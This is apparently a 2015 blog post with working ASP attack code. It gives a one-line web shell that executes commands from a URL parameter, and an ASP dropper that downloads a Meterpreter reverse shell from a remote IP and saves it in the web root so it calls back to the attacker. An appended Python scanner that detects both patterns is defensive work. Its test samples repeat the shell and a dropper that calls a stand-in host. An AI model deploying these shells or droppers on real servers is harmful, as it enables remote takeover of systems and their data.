Tuesday, July 14, 2015

One Line ASP Shell

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
Request with http://target/shell.asp?cmd=ipconfig

Write to local file from ASP

I'm currently doing an exercise that requires me to have a server pull a reverse meterpreter asp shell from a remote location and store it to a specific file location on the server filesystem. This is the ASP code I ended up creating:

<%
' Fetch a URL with a synchronous server-side GET and return the response body.
Function GetTextFromUrl(url)
  Dim oXMLHTTP
  Set oXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP.3.0")

  oXMLHTTP.Open "GET", url, False
  oXMLHTTP.Send

  If oXMLHTTP.Status = 200 Then
    GetTextFromUrl = oXMLHTTP.responseText
  End If
End Function

Dim sResult : sResult = GetTextFromUrl("http://192.168.50.172/meta.txt")
Response.Write sResult

' Write the fetched text to a file on the server (True = overwrite if it exists).
Dim fs, f
Set fs = Server.CreateObject("Scripting.FileSystemObject")
Set f = fs.CreateTextFile("C:/Program Files (x86)/WEBSERVERHERE/test.asp", True)
f.Write sResult
f.Close
Set f = Nothing
Set fs = Nothing
%>

"http://192.168.50.172/meta.txt" is the Meterpreter ASP shell saved as a .txt file.

"C:/Program Files (x86)/WEBSERVERHERE/test.asp" is the path where the contents of meta.txt will be saved on the server's filesystem. Ideally you'd save that ASP shell to a directory accessible via the web, because simply visiting the .asp file will execute it and connect back to your multi handler.
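For the defending side, both snippets above leave a recognizable footprint in ASP source: a WScript.Shell Exec call fed from the request, and a server-side HTTP fetch paired with a FileSystemObject write. The scanner below is an added example, not code from the original post; the rule names, sample strings, fetch.example URL and placeholder path are constructed for illustration.

```python
import re
from pathlib import Path

# Only server-side code between <% and %> is inspected.
ASP_BLOCK = re.compile(r"<%(.*?)%>", re.S)

# A rule fires only when every one of its patterns matches (assumed rule names).
RULES = {
    # WScript.Shell whose Exec/Run argument comes straight from the request.
    "request-driven-exec": [
        r'CreateObject\s*\(\s*"WScript\.Shell"',
        r'\.\s*(Exec|Run)\s*\(?\s*Request\b',
    ],
    # Server-side HTTP fetch combined with a FileSystemObject file write.
    "remote-fetch-to-file": [
        r'CreateObject\s*\(\s*"(MSXML2|Microsoft)\.(Server)?XMLHTTP',
        r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"',
        r'\.\s*(CreateTextFile|OpenTextFile)\s*\(',
    ],
}
# VBScript is case-insensitive, so the patterns are too.
COMPILED = {n: [re.compile(p, re.I) for p in ps] for n, ps in RULES.items()}

def scan_asp_source(text):
    """Return sorted names of the rules that match the page's server-side code."""
    code = "\n".join(ASP_BLOCK.findall(text))
    return sorted(n for n, ps in COMPILED.items() if all(p.search(code) for p in ps))

def scan_webroot(root):
    """Map each flagged .asp/.asa file under root to its rule names."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".asp", ".asa"}:
            found = scan_asp_source(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed samples: the first two mirror the snippets in this post.
SHELL = '<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>'
DROPPER = '''<% Set x = CreateObject("MSXML2.ServerXMLHTTP.3.0")
x.Open "GET", "http://fetch.example/meta.txt", False : x.Send
Set fs = Server.CreateObject("Scripting.FileSystemObject")
Set f = fs.CreateTextFile("C:/inetpub/placeholder/test.asp", True) : f.write(x.responseText) %>'''
BENIGN = '''<% Set fs = Server.CreateObject("Scripting.FileSystemObject")
Set f = fs.OpenTextFile(Server.MapPath("visits.log"), 8, True) : f.WriteLine Now %>'''
```

A page that only appends to a log with FileSystemObject (the BENIGN sample) matches no rule, because each rule requires all of its patterns to appear together.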